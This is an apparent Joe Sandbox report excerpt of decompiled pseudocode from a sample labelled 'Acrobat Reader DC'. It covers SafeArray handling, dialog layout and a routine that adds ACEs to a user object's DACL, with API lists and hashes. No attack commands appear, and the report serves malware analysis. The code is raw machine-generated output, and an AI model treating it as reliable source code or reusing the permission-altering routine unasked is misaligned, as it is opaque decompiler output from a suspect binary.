											_v36 = _v20 + _t208 * 4;
											E00468070( *( *((intOrPtr*)( *_t212)) + _t208 * 4),  &_v44);
											_t208 = _t208 + 1;
											__eflags = _t208 - _t146;
										} while (__eflags < 0);
									}
									__imp__#24(_v12);
									return 1;
								}
							} else {
								if(_t109 == 0x100) {
									__imp__#23(_t202,  &_v16);
									__eflags = _t109;
									if(_t109 >= 0) {
										_t210 = 0;
										__eflags = _t146;
										if(__eflags > 0) {
											do {
												_push(0x10);
												_t139 = E004115D7(_t210, _t212, __eflags);
												_t220 = _t220 + 4;
												__eflags = _t139;
												if(_t139 == 0) {
													_t139 = 0;
													__eflags = 0;
												} else {
													 *_t139 = 0;
													 *((intOrPtr*)(_t139 + 8)) = 1;
													 *((intOrPtr*)(_t139 + 0xc)) = 0;
												}
												 *( *((intOrPtr*)( *_t212)) + _t210 * 4) = _t139;
												_v44 = 8;
												_v36 =  *((intOrPtr*)(_v16 + _t210 * 4));
												E00468070( *( *((intOrPtr*)( *_t212)) + _t210 * 4),  &_v44);
												_t210 = _t210 + 1;
												__eflags = _t210 - _t146;
											} while (__eflags < 0);
										}
										L57:
										__imp__#24(_v12);
									}
									goto L58;
								} else {
									if(_t109 != 0x200) {
										L30:
										__eflags = _t157;
										if(_t157 >= 0) {
											goto L12;
										} else {
											__imp__#77(_t202,  &_a8);
											_t161 = _a8;
											_t120 = (_t161 & 0x0000ffff) + 0xfffffffe;
											__eflags = _t120 - 0x15;
											if(_t120 > 0x15) {
												L42:
												_t183 = _t161 & 0x0000ffff;
												__eflags = _t183 & 0x00004000;
												if((_t183 & 0x00004000) == 0) {
													goto L12;
												} else {
													goto L43;
												}
											} else {
												_t51 = _t120 + 0x46805a; // 0x6608558b
												switch( *((intOrPtr*)(( *_t51 & 0x000000ff) * 4 +  &M00468042))) {
													case 0:
														_a4 = 2;
														goto L36;
													case 1:
														L43:
														_a4 = 4;
														goto L36;
													case 2:
														_a4 = 8;
														goto L36;
													case 3:
														_a4 = 1;
														L36:
														_t121 =  &_v8;
														_push(_t121);
														_push(_t202);
														__imp__#23();
														__eflags = _t121;
														if(_t121 < 0) {
															L58:
															return 1;
														} else {
															_t205 = 0;
															__eflags = _t146;
															if(__eflags > 0) {
																do {
																	_push(0x10);
																	_t123 = E004115D7(_t205, _t212, __eflags);
																	_t220 = _t220 + 4;
																	__eflags = _t123;
																	if(_t123 == 0) {
																		_t123 = 0;
																		__eflags = 0;
																	} else {
																		 *_t123 = 0;
																		 *((intOrPtr*)(_t123 + 8)) = 1;
																		 *((intOrPtr*)(_t123 + 0xc)) = 0;
																	}
																	 *( *((intOrPtr*)( *_t212)) + _t205 * 4) = _t123;
																	_t124 = _a8;
																	_t163 = _t124 & 0x0000ffff;
																	__eflags = _t163 & 0x00004000;
																	if((_t163 & 0x00004000) == 0) {
																		_t187 = 0x00004000 | _t124;
																		__eflags = _t187;
																		_v44 = _t187;
																		_v36 = _v8;
																	} else {
																		_v44 = _t124;
																		E00410E60( &_v36, _v8, _a4);
																		_t220 = _t220 + 0xc;
																	}
																	E00468070( *( *((intOrPtr*)( *_t212)) + _t205 * 4),  &_v44);
																	_v8 = _v8 + _a4;
																	_t205 = _t205 + 1;
																	__eflags = _t205 - _t146;
																} while (__eflags < 0);
															}
															_push(_v12);
															__imp__#24();
															return 1;
														}
														goto L59;
													case 4:
														_t130 =  &_v8;
														_push(_t130);
														_push(_t202);
														__imp__#23();
														__eflags = _t130;
														if(__eflags < 0) {
															goto L12;
														} else {
															E00410E60(E00453132(_v8, __eflags, _t212, _t146), _v8, _t146);
															_push(_t202);
															__imp__#24();
															return 1;
														}
														goto L59;
													case 5:
														goto L42;
												}
											}
										}
									} else {
										L12:
										E00408F40(_t202, _t212);
										goto L13;
									}
								}
							}
						}
					}
				}
				L59:
			}




































                                  0x00467c91
                                  0x00467c94
                                  0x00467c97
                                  0x00467c9c
                                  0x00467ca5
                                  0x00467d53
                                  0x00467d5b
                                  0x00467cab
                                  0x00467cb0
                                  0x00467cbc
                                  0x00467cbf
                                  0x00467cc2
                                  0x00467cb2
                                  0x00467cb5
                                  0x00467cb7
                                  0x00467cb7
                                  0x00467cc6
                                  0x00000000
                                  0x00467ccc
                                  0x00467cce
                                  0x00467cd8
                                  0x00467cde
                                  0x00467ce0
                                  0x00467ce8
                                  0x00467cea
                                  0x00467ced
                                  0x00467cf2
                                  0x00467cf5
                                  0x00467cfa
                                  0x00467cfe
                                  0x00467d01
                                  0x00467d03
                                  0x00467d04
                                  0x00467d07
                                  0x00467cf5
                                  0x00467d13
                                  0x00467d1a
                                  0x00467d1d
                                  0x00467d23
                                  0x00467d28
                                  0x00467d2b
                                  0x00467d30
                                  0x00467e59
                                  0x00467e5e
                                  0x00467fbc
                                  0x00467fc1
                                  0x00467fc7
                                  0x00467fc9
                                  0x00467fcb
                                  0x00467fcd
                                  0x00467fcf
                                  0x00467fd1
                                  0x00467fd4
                                  0x00467fd4
                                  0x00467fd6
                                  0x00467fdb
                                  0x00467fde
                                  0x00467fe0
                                  0x00467ff8
                                  0x00467ff8
                                  0x00467fe2
                                  0x00467fe2
                                  0x00467fe8
                                  0x00467fef
                                  0x00467fef
                                  0x00467ffe
                                  0x0046800e
                                  0x00468012
                                  0x0046801e
                                  0x00468023
                                  0x00468027
                                  0x00468028
                                  0x00468028
                                  0x00467fd4
                                  0x00000000
                                  0x00467fcf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00467d36
                                  0x00467d36
                                  0x00467ddc
                                  0x00467de2
                                  0x00467de4
                                  0x00000000
                                  0x00467dea
                                  0x00467dea
                                  0x00467dec
                                  0x00467dee
                                  0x00467df0
                                  0x00467df0
                                  0x00467df2
                                  0x00467df7
                                  0x00467dfa
                                  0x00467dfc
                                  0x00467e14
                                  0x00467e14
                                  0x00467dfe
                                  0x00467dfe
                                  0x00467e04
                                  0x00467e0b
                                  0x00467e0b
                                  0x00467e1a
                                  0x00467e2a
                                  0x00467e2e
                                  0x00467e3a
                                  0x00467e3f
                                  0x00467e40
                                  0x00467e40
                                  0x00467df0
                                  0x00467e48
                                  0x00467e56
                                  0x00467e56
                                  0x00467d3c
                                  0x00467d41
                                  0x00467d63
                                  0x00467d69
                                  0x00467d6b
                                  0x00467d71
                                  0x00467d73
                                  0x00467d75
                                  0x00467d7e
                                  0x00467d7e
                                  0x00467d80
                                  0x00467d85
                                  0x00467d88
                                  0x00467d8a
                                  0x00467da2
                                  0x00467da2
                                  0x00467d8c
                                  0x00467d8c
                                  0x00467d92
                                  0x00467d99
                                  0x00467d99
                                  0x00467da8
                                  0x00467db3
                                  0x00467dbc
                                  0x00467dc8
                                  0x00467dcd
                                  0x00467dce
                                  0x00467dce
                                  0x00467dd2
                                  0x0046802c
                                  0x00468030
                                  0x00468030
                                  0x00000000
                                  0x00467d43
                                  0x00467d48
                                  0x00467e64
                                  0x00467e64
                                  0x00467e66
                                  0x00000000
                                  0x00467e6c
                                  0x00467e71
                                  0x00467e77
                                  0x00467e7e
                                  0x00467e81
                                  0x00467e84
                                  0x00467f2c
                                  0x00467f2c
                                  0x00467f2f
                                  0x00467f35
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00467e8a
                                  0x00467e8a
                                  0x00467e91
                                  0x00000000
                                  0x00467f1a
                                  0x00000000
                                  0x00000000
                                  0x00467f3b
                                  0x00467f3b
                                  0x00000000
                                  0x00000000
                                  0x00467f23
                                  0x00000000
                                  0x00000000
                                  0x00467ed2
                                  0x00467ed9
                                  0x00467ed9
                                  0x00467edc
                                  0x00467edd
                                  0x00467ede
                                  0x00467ee4
                                  0x00467ee6
                                  0x00468036
                                  0x0046803e
                                  0x00467eec
                                  0x00467eec
                                  0x00467eee
                                  0x00467ef0
                                  0x00467ef6
                                  0x00467ef6
                                  0x00467ef8
                                  0x00467efd
                                  0x00467f00
                                  0x00467f02
                                  0x00467f44
                                  0x00467f44
                                  0x00467f04
                                  0x00467f04
                                  0x00467f0a
                                  0x00467f11
                                  0x00467f11
                                  0x00467f4a
                                  0x00467f4d
                                  0x00467f51
                                  0x00467f54
                                  0x00467f5a
                                  0x00467f7b
                                  0x00467f7b
                                  0x00467f81
                                  0x00467f85
                                  0x00467f5c
                                  0x00467f5f
                                  0x00467f6c
                                  0x00467f71
                                  0x00467f71
                                  0x00467f93
                                  0x00467f9b
                                  0x00467f9e
                                  0x00467f9f
                                  0x00467f9f
                                  0x00467ef6
                                  0x00467faa
                                  0x00467fab
                                  0x00467fb9
                                  0x00467fb9
                                  0x00000000
                                  0x00000000
                                  0x00467e98
                                  0x00467e9b
                                  0x00467e9c
                                  0x00467e9d
                                  0x00467ea3
                                  0x00467ea5
                                  0x00000000
                                  0x00467eab
                                  0x00467eb8
                                  0x00467ec0
                                  0x00467ec1
                                  0x00467ecf
                                  0x00467ecf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00467e91
                                  0x00467e84
                                  0x00467d4e
                                  0x00467d4e
                                  0x00467d4e
                                  0x00000000
                                  0x00467d4e
                                  0x00467d48
                                  0x00467d41
                                  0x00467d36
                                  0x00467d30
                                  0x00467cc6
                                  0x00000000

                                  APIs
                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                  • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                  • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                  • _memmove.LIBCMT ref: 00467EB8
                                  • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                  • _memmove.LIBCMT ref: 00467F6C
                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                  • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                  • String ID:
                                  • API String ID: 2170234536-0
                                  • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                  • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                  • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                  • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E004357B7(intOrPtr _a4, intOrPtr _a8, struct HWND__* _a12, struct HWND__* _a16) {
				struct tagRECT _v20;
				void* _t55;
				struct HWND__* _t57;
				struct HWND__* _t59;
				struct HWND__* _t61;
				struct HWND__* _t62;
				long _t67;
				signed int _t68;
				int _t69;
				long _t73;
				long _t83;
				signed int _t92;
				long _t99;
				signed int _t100;
				long _t103;
				signed int _t104;
				signed int _t108;
				int _t109;
				long _t113;
				signed int _t117;
				signed int _t119;
				long _t123;
				struct HWND__* _t127;
				int _t131;
				signed int _t133;

				_t92 = _a12;
				_t131 = 0;
				_t127 = _a16;
				if(_a8 != 1) {
					_t57 = GetDlgItem( *(_a4 + 0x54), 1);
					_a12 = _t57;
					if(_t57 != 0) {
						GetWindowRect(_t57,  &_v20);
						_t123 = _v20.left;
						_t83 = _v20.right;
						if(_t123 > _t83) {
							_t113 = _t123;
							_t123 = _t83;
							_t83 = _t113;
							_v20.left = _t123;
							_v20.right = _t83;
						}
						_t133 = _v20.top;
						_t108 = _v20.bottom;
						if(_t133 > _t108) {
							_a16 = _t133;
							_t133 = _t108;
							_t108 = _a16;
							_v20.top = _t133;
							_v20.bottom = _t108;
						}
						_t124 = _t83 - _t123;
						_t109 = _t108 - _t133;
						asm("cdq");
						asm("cdq");
						_t131 = _t127 - _t109 - 0xa;
						MoveWindow(_a12, (0xa - _t83 - _t123 - _t83 - _t123 >> 1) + (_t92 + (_t124 & 0x00000003) >> 2), _t131, _t124, _t109, 0);
					}
					_t59 = GetDlgItem( *(_a4 + 0x54), 2);
					_a16 = _t59;
					if(_t59 != 0) {
						GetWindowRect(_t59,  &_v20);
						_t103 = _v20.left;
						_t73 = _v20.right;
						if(_t103 > _t73) {
							_v20.left = _t73;
							_t73 = _t103;
							_v20.right = _t73;
						}
						_t119 = _v20.top;
						_t104 = _v20.bottom;
						if(_t119 > _t104) {
							_v20.top = _t104;
							_t104 = _t119;
							_v20.bottom = _t104;
						}
						_t74 = _t73 - _v20.left;
						asm("cdq");
						asm("cdq");
						MoveWindow(_a16, (_t92 + _t92 * 2 + (_t119 & 0x00000003) >> 2) - (_t73 - _v20.left + 0xa - _t119 >> 1), _t131, _t74, _t104 - _v20.top, 0);
					}
					_t61 = GetDlgItem( *(_a4 + 0x54), 0x3e9);
					_a16 = _t61;
					if(_t61 != 0) {
						GetWindowRect(_t61,  &_v20);
						_t67 = _v20.left;
						_t99 = _v20.right;
						if(_t67 > _t99) {
							_v20.left = _t99;
							_v20.right = _t67;
						}
						_t100 = _v20.top;
						_t68 = _v20.bottom;
						if(_t100 > _t68) {
							_t117 = _t100;
							_t100 = _t68;
							_t68 = _t117;
							_v20.top = _t100;
							_v20.bottom = _t68;
						}
						_t69 = _t68 - _t100;
						_t131 = _t131 + 0xfffffffb - _t69;
						MoveWindow(_a16, 0xa, _t131, _t92 - 0x14, _t69, 0);
					}
					_t62 = GetDlgItem( *(_a4 + 0x54), 0x3ea);
					if(_t62 != 0) {
						MoveWindow(_t62, 0xa, 0xa, _t92 + 0xffffffec, _t131 + 0xfffffffb, 0);
					}
					return InvalidateRect( *(_a4 + 0x54), 0, 1);
				}
				return _t55;
			}




























                                  0x004357be
                                  0x004357c2
                                  0x004357c9
                                  0x004357cc
                                  0x004357db
                                  0x004357e1
                                  0x004357e6
                                  0x004357ed
                                  0x004357f3
                                  0x004357f6
                                  0x004357fb
                                  0x004357fd
                                  0x004357ff
                                  0x00435801
                                  0x00435803
                                  0x00435806
                                  0x00435806
                                  0x00435809
                                  0x0043580c
                                  0x00435811
                                  0x00435813
                                  0x00435816
                                  0x00435818
                                  0x0043581b
                                  0x0043581e
                                  0x0043581e
                                  0x00435823
                                  0x00435825
                                  0x00435832
                                  0x0043583b
                                  0x00435844
                                  0x00435857
                                  0x00435857
                                  0x0043586a
                                  0x00435870
                                  0x00435875
                                  0x0043587c
                                  0x00435882
                                  0x00435885
                                  0x0043588a
                                  0x0043588c
                                  0x0043588f
                                  0x00435891
                                  0x00435891
                                  0x00435894
                                  0x00435897
                                  0x0043589c
                                  0x0043589e
                                  0x004358a1
                                  0x004358a3
                                  0x004358a3
                                  0x004358a6
                                  0x004358b3
                                  0x004358bb
                                  0x004358ce
                                  0x004358ce
                                  0x004358dc
                                  0x004358e2
                                  0x004358e7
                                  0x004358ee
                                  0x004358f4
                                  0x004358f7
                                  0x004358fc
                                  0x004358fe
                                  0x00435901
                                  0x00435901
                                  0x00435904
                                  0x00435907
                                  0x0043590c
                                  0x0043590e
                                  0x00435910
                                  0x00435912
                                  0x00435914
                                  0x00435917
                                  0x00435917
                                  0x0043591a
                                  0x0043592d
                                  0x00435933
                                  0x00435933
                                  0x00435941
                                  0x00435949
                                  0x0043595a
                                  0x0043595a
                                  0x00000000
                                  0x00435967
                                  0x00435973

                                  APIs
                                  • GetDlgItem.USER32 ref: 004357DB
                                  • GetWindowRect.USER32 ref: 004357ED
                                  • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                  • GetDlgItem.USER32 ref: 0043586A
                                  • GetWindowRect.USER32 ref: 0043587C
                                  • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                  • GetDlgItem.USER32 ref: 004358DC
                                  • GetWindowRect.USER32 ref: 004358EE
                                  • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                  • GetDlgItem.USER32 ref: 00435941
                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$ItemMoveRect$Invalidate
                                  • String ID:
                                  • API String ID: 3096461208-0
                                  • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                  • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                  • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                  • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00446124 Relevance: 18.2, APIs: 12, Instructions: 182COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00446124(void* __eflags, void* _a4, void* _a8, intOrPtr _a12) {
				char _v5;
				struct _ACL* _v12;
				void* _v16;
				struct _ACL* _v20;
				struct _ACL* _v24;
				long _v28;
				char _v32;
				int _v36;
				int _v40;
				intOrPtr _v48;
				void _v52;
				struct _ACL* _t70;
				void* _t74;
				void* _t78;
				void* _t84;
				void _t88;
				struct _ACL* _t94;
				signed short _t113;
				intOrPtr* _t115;
				struct _SECURITY_DESCRIPTOR* _t116;
				long _t117;
				void* _t118;
				void* _t119;

				_t118 = 0;
				_t94 = 0;
				_v5 = 0;
				_v20 = 0;
				_v24 = 0;
				_v16 = 0;
				_v28 = 4;
				if(E00436E2B(_a4,  &_v28,  &_v20,  &_v32) == 0 || E00436DF7( &_v24, _v32) == 0) {
					L20:
					E00436BA9(_v20);
					E00436BA9(_v24);
					E00436BA9(_t94);
					E00436BA9(_t118);
					return _v5;
				} else {
					_v12 = 0;
					if(GetSecurityDescriptorDacl(_v20,  &_v36,  &_v12,  &_v40) == 0) {
						goto L20;
					}
					E00412F40( &_v52, 0, 0xc);
					_t70 = _v12;
					_t119 = _t119 + 0xc;
					_v48 = 8;
					if(_t70 == 0 || GetAclInformation(_t70,  &_v52, 0xc, 2) != 0) {
						_t24 = GetLengthSid(_a8) * 2; // 0x18
						_t74 = E00436DBF( &_v16, _v48 + _t24 + 0x10);
						_t94 = _v16;
						if(_t74 == 0) {
							goto L20;
						}
						if(_v36 == _t118) {
							L12:
							_t36 = GetLengthSid(_a8) + 8; // 0x8
							_t113 = _t36;
							_t118 = E00436B91(_t113);
							_t119 = _t119 + 4;
							if(_t118 == 0) {
								goto L20;
							}
							_t78 = _a8;
							_t38 = _t118 + 8; // 0x8
							 *(_t118 + 2) = _t113;
							if(CopySid(GetLengthSid(_t78), _t38, _t78) == 0) {
								goto L20;
							}
							_a8 = 0;
							_t115 = _a12 + 4;
							while(1) {
								 *_t118 =  *((intOrPtr*)(_t115 - 4));
								 *((char*)(_t118 + 1)) =  *((intOrPtr*)(_t115 - 3));
								 *((intOrPtr*)(_t118 + 4)) =  *_t115;
								if(AddAce(_t94, 2, 0xffffffff, _t118,  *(_t118 + 2) & 0x0000ffff) == 0) {
									goto L20;
								}
								_t84 = _a8 + 1;
								_t115 = _t115 + 0xc;
								_a8 = _t84;
								if(_t84 < 2) {
									continue;
								}
								_t116 = _v24;
								if(SetSecurityDescriptorDacl(_t116, 1, _t94, 0) != 0 && SetUserObjectSecurity(_a4,  &_v28, _t116) != 0) {
									_v5 = 1;
								}
								goto L20;
							}
							goto L20;
						}
						_t88 = _v52;
						if(_t88 == _t118) {
							goto L12;
						}
						_t117 = 0;
						if(_t88 <= _t118) {
							goto L12;
						}
						while(GetAce(_v12, _t117,  &_v16) != 0 && AddAce(_t94, 2, 0xffffffff, _v16,  *(_v16 + 2) & 0x0000ffff) != 0) {
							_t117 = _t117 + 1;
							if(_t117 < _v52) {
								continue;
							}
							goto L12;
						}
					}
					goto L20;
				}
			}


























                                  0x0044613c
                                  0x0044613e
                                  0x00446141
                                  0x00446145
                                  0x00446148
                                  0x0044614b
                                  0x0044614e
                                  0x0044615c
                                  0x004462e6
                                  0x004462ea
                                  0x004462f3
                                  0x004462f9
                                  0x004462ff
                                  0x00446310
                                  0x00446177
                                  0x00446187
                                  0x00446192
                                  0x00000000
                                  0x00000000
                                  0x0044619f
                                  0x004461a4
                                  0x004461a7
                                  0x004461aa
                                  0x004461b3
                                  0x004461d9
                                  0x004461e2
                                  0x004461e7
                                  0x004461ec
                                  0x00000000
                                  0x00000000
                                  0x004461f5
                                  0x0044623d
                                  0x00446247
                                  0x00446247
                                  0x00446250
                                  0x00446252
                                  0x00446257
                                  0x00000000
                                  0x00000000
                                  0x0044625d
                                  0x00446261
                                  0x00446266
                                  0x00446279
                                  0x00000000
                                  0x00000000
                                  0x0044627e
                                  0x00446285
                                  0x00446288
                                  0x00446290
                                  0x0044629d
                                  0x004462a0
                                  0x004462ab
                                  0x00000000
                                  0x00000000
                                  0x004462b0
                                  0x004462b1
                                  0x004462b4
                                  0x004462ba
                                  0x00000000
                                  0x00000000
                                  0x004462bc
                                  0x004462cd
                                  0x004462e2
                                  0x004462e2
                                  0x00000000
                                  0x004462cd
                                  0x00000000
                                  0x00446288
                                  0x004461f7
                                  0x004461fc
                                  0x00000000
                                  0x00000000
                                  0x004461fe
                                  0x00446202
                                  0x00000000
                                  0x00000000
                                  0x00446204
                                  0x00446237
                                  0x0044623b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044623b
                                  0x00446204
                                  0x00000000
                                  0x004461b3

                                  APIs
                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                    • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                    • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                  • _memset.LIBCMT ref: 0044619F
                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                  • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                  • GetLengthSid.ADVAPI32(?), ref: 00446241
                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                  • CopySid.ADVAPI32(00000000), ref: 00446271
                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                  • SetUserObjectSecurity.USER32 ref: 004462D8
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                  • String ID:
                                  • API String ID: 3490752873-0
                                  • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                  • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                  • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                  • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00445F35 Relevance: 18.2, APIs: 12, Instructions: 182COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00445F35(void* __eflags, void* _a4, void* _a8, intOrPtr _a12) {
				char _v5;
				struct _ACL* _v12;
				void* _v16;
				struct _ACL* _v20;
				struct _ACL* _v24;
				long _v28;
				char _v32;
				int _v36;
				int _v40;
				intOrPtr _v48;
				void _v52;
				struct _ACL* _t70;
				void* _t74;
				void* _t78;
				void* _t84;
				void _t88;
				struct _ACL* _t94;
				signed short _t113;
				intOrPtr* _t115;
				struct _SECURITY_DESCRIPTOR* _t116;
				long _t117;
				void* _t118;
				void* _t119;

				_t118 = 0;
				_t94 = 0;
				_v5 = 0;
				_v20 = 0;
				_v24 = 0;
				_v16 = 0;
				_v28 = 4;
				if(E00436E2B(_a4,  &_v28,  &_v20,  &_v32) == 0 || E00436DF7( &_v24, _v32) == 0) {
					L20:
					E00436BA9(_v20);
					E00436BA9(_v24);
					E00436BA9(_t94);
					E00436BA9(_t118);
					return _v5;
				} else {
					_v12 = 0;
					if(GetSecurityDescriptorDacl(_v20,  &_v36,  &_v12,  &_v40) == 0) {
						goto L20;
					}
					E00412F40( &_v52, 0, 0xc);
					_t70 = _v12;
					_t119 = _t119 + 0xc;
					_v48 = 8;
					if(_t70 == 0 || GetAclInformation(_t70,  &_v52, 0xc, 2) != 0) {
						_t24 = GetLengthSid(_a8) * 2; // 0x18
						_t74 = E00436DBF( &_v16, _v48 + _t24 + 0x10);
						_t94 = _v16;
						if(_t74 == 0) {
							goto L20;
						}
						if(_v36 == _t118) {
							L12:
							_t36 = GetLengthSid(_a8) + 8; // 0x8
							_t113 = _t36;
							_t118 = E00436B91(_t113);
							_t119 = _t119 + 4;
							if(_t118 == 0) {
								goto L20;
							}
							_t78 = _a8;
							_t38 = _t118 + 8; // 0x8
							 *(_t118 + 2) = _t113;
							if(CopySid(GetLengthSid(_t78), _t38, _t78) == 0) {
								goto L20;
							}
							_a8 = 0;
							_t115 = _a12 + 4;
							while(1) {
								 *_t118 =  *((intOrPtr*)(_t115 - 4));
								 *((char*)(_t118 + 1)) =  *((intOrPtr*)(_t115 - 3));
								 *((intOrPtr*)(_t118 + 4)) =  *_t115;
								if(AddAce(_t94, 2, 0xffffffff, _t118,  *(_t118 + 2) & 0x0000ffff) == 0) {
									goto L20;
								}
								_t84 = _a8 + 1;
								_t115 = _t115 + 0xc;
